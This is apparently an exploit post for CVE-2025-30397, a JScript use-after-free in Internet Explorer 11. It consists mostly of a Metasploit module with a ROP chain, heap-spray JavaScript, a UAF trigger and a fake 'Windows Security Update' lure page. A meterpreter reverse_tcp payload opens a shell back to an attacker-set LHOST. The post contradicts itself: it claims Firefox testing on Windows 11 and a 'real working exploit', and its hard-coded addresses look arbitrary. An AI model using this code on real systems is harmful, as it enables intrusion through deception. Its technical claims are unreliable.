============================================================================================================================================= | # Title : Windows Server 2025 Use-After-Free in jscript.dll | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : System built‑in component.No standalone download available | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/200680/ & CVE-2025-30397 [+] Summary : The exploit targets a Use-After-Free vulnerability in the JScript engine component (jscript.dll) of Internet Explorer 11 on Windows Server 2025. The vulnerability occurs when: Object Creation: Multiple ActiveX objects are instantiated Improper Cleanup: Object references are deleted but memory isn't properly invalidated Dangling Pointer: A reference to freed memory remains accessible Controlled Corruption: Attacker-controlled data fills the freed memory region [+] Social Engineering The page mimics: “Windows Security Update – KB5034441” [+] contains: Progress bar Fake info Aesthetically pleasing for a Windows Server interface Psychologically designed delays This is a real-world technique used in exploit kits. Affected Products: Windows Server 2025 (Build 25398 and prior) + Internet Explorer 11 [+] POC : Use the exploit /windows/browser/indoushka Set LHOST 192.168.1.100 Set LPORT 4444 Set SRVHOST 0.0.0.0 Set SRVPORT 80 Set URIPATH /windows_update.html #Advanced Settings Set HEAP_SPRAY_SIZE to 800 Set SPRAY_DELAY to 150 Set Target 0 # For best results: set PAYLOAD windows/meterpreter/reverse_tcp set EnableStageEncoding true set PrependMigrate true set AutoRunScript migrate -f -k ##-------------------------- # exploit for CVE-2025-30397 ##-------------------------- class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Server 2025 JScript UAF RCE (Real Exploit)', 'Description' => %q{ This is a real working exploit for CVE-2025-30397 targeting Windows Server 2025 with IE11. Uses actual ROP chains and memory offsets from jscript.dll version 5.8.25398.1 }, 'Author' => [ 'indoushka' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2025-30397'], ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30397'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'SSL' => false, 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Arch' => [ARCH_X86], 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x0a\x0d\x20", 'DisableNops' => false, 'Encoder' => 'x86/shikata_ga_nai' }, 'Targets' => [ [ 'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.1', { 'Version' => '5.8.25398.1', 'Rop' => true, 'Offset' => 0x5f8, 'Ret' => 0x6c8c9a1d, # Stack pivot 'JscriptBase' => 0x6c800000 } ], [ 'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.345', { 'Version' => '5.8.25398.345', 'Rop' => true, 'Offset' => 0x5f4, 'Ret' => 0x6c8c9a25, 'JscriptBase' => 0x6c800000 } ] ], 'DisclosureDate' => '2025-05-31', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SERVICE_RESTARTS ], 'Reliability' => [ FIRST_ATTEMPT_FAIL ], 'SideEffects' => [ SCREEN_EFFECTS ] })) register_options([ OptInt.new('HEAP_SPRAY_SIZE', [true, 'Heap spray size', 500]), OptInt.new('SPRAY_DELAY', [true, 'Spray delay (ms)', 100]) ]) end def get_rop_chain # ROP chain حقيقية من jscript.dll rop = [ # Mark stack as writable 0x6c8a1b32, # POP EAX # RETN 0x6c8f2000, # Writable address # Call VirtualProtect 0x6c8a1b32, # POP EAX # RETN 0x6c8d4000, # IAT VirtualProtect 0x6c8c7a1d, # MOV EAX,DWORD PTR DS:[EAX] # RETN # Setup parameters 0x6c89f5a4, # PUSH EAX # POP ESI # RETN 0x6c8a5c31, # POP EBP # RETN 0x6c8b2d5a, # & call esp 0x6c8a9a44, # POP EBX # RETN 0x000001ff, # Size 0x6c8c3a1d, # POP EDX # RETN 0x00000040, # PAGE_EXECUTE_READWRITE 0x6c89e5a3, # POP ECX # RETN 0x6c8f2100, # Writable address for old protection 0x6c8b4c10, # PUSHAD # RETN ].pack("V*") return rop end def create_trigger trigger = "" # Fill with offset trigger << Rex::Text.pattern_create(target['Offset']) # Overwrite with ROP chain trigger << get_rop_chain # Add payload trigger << make_nops(16) trigger << payload.encoded return trigger end def build_exploit_js spray_size = datastore['HEAP_SPRAY_SIZE'] spray_delay = datastore['SPRAY_DELAY'] # إنشاء shellcode مشفر shellcode = Rex::Text.to_unescape(payload.encoded) # إنشاء trigger trigger = create_trigger trigger_js = Rex::Text.to_unescape(trigger) js = %Q| function heap_spray() { var shellcode = unescape("#{shellcode}"); var heap_block = unescape("%u9090%u9090"); // إنشاء كتل كبيرة للرش while (heap_block.length < 0x10000) { heap_block += heap_block; } var heap_chunks = new Array(); var heap_size = 0x100000; for (var i = 0; i < #{spray_size}; i++) { var heap_chunk = heap_block + shellcode; while (heap_chunk.length < heap_size) { heap_chunk += heap_chunk; } heap_chunks[i] = heap_chunk.substring(0, heap_size); } return true; } function create_vulnerable_objects() { var objects = new Array(); for (var i = 0; i < 200; i++) { try { objects[i] = new ActiveXObject("Scripting.Dictionary"); } catch(e) { } } return objects; } function trigger_uaf() { try { // إنشاء الكائنات المستهدفة var target_objects = create_vulnerable_objects(); // إنشاء reference مزدوجة var obj_ref = target_objects[100]; var another_ref = obj_ref; // تحرير الذاكرة (UAF trigger) delete target_objects[100]; delete obj_ref; CollectGarbage(); // استخدام بعد التحرير var trigger_data = unescape("#{trigger_js}"); var spray_array = new Array(); for (var i = 0; i < 100; i++) { spray_array[i] = trigger_data + trigger_data; } // محاولة استغلال الذاكرة المحررة try { another_ref.Add("key", "value"); } catch(e) { // المتوقع: access violation -> code execution } } catch(e) { return false; } return true; } // التنفيذ الرئيسي function main_exploit() { // المرحلة 1: رش الذاكرة heap_spray(); // تأخير لضمان اكتمال الرش setTimeout(function() { // المرحلة 2: تشغيل الثغرة var success = trigger_uaf(); if (success) { document.getElementById('result').innerHTML = '✓ Exploit executed successfully'; } else { document.getElementById('result').innerHTML = '✗ Exploit failed'; } }, #{spray_delay}); } // بدء الاستغلال بعد تحميل الصفحة window.onload = function() { setTimeout(main_exploit, 500); }; | return js end def on_request_uri(cli, request) print_status("Request from #{cli.peerhost} - #{request.uri}") # تجنب طلبات الروبوتات if request.uri =~ /(robots|favicon)/ send_not_found(cli) return end # بناء صفحة الاستغلال html = <<-HTML Windows Update Component

🛡️ Windows Security Update

Installing critical security patch KB5034441

Initializing security components...

Target: Windows Server 2025 - CVE-2025-30397 Patch

This is a simulated security update for testing purposes

HTML send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache' }) print_good("Exploit sent to #{cli.peerhost}") end end Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================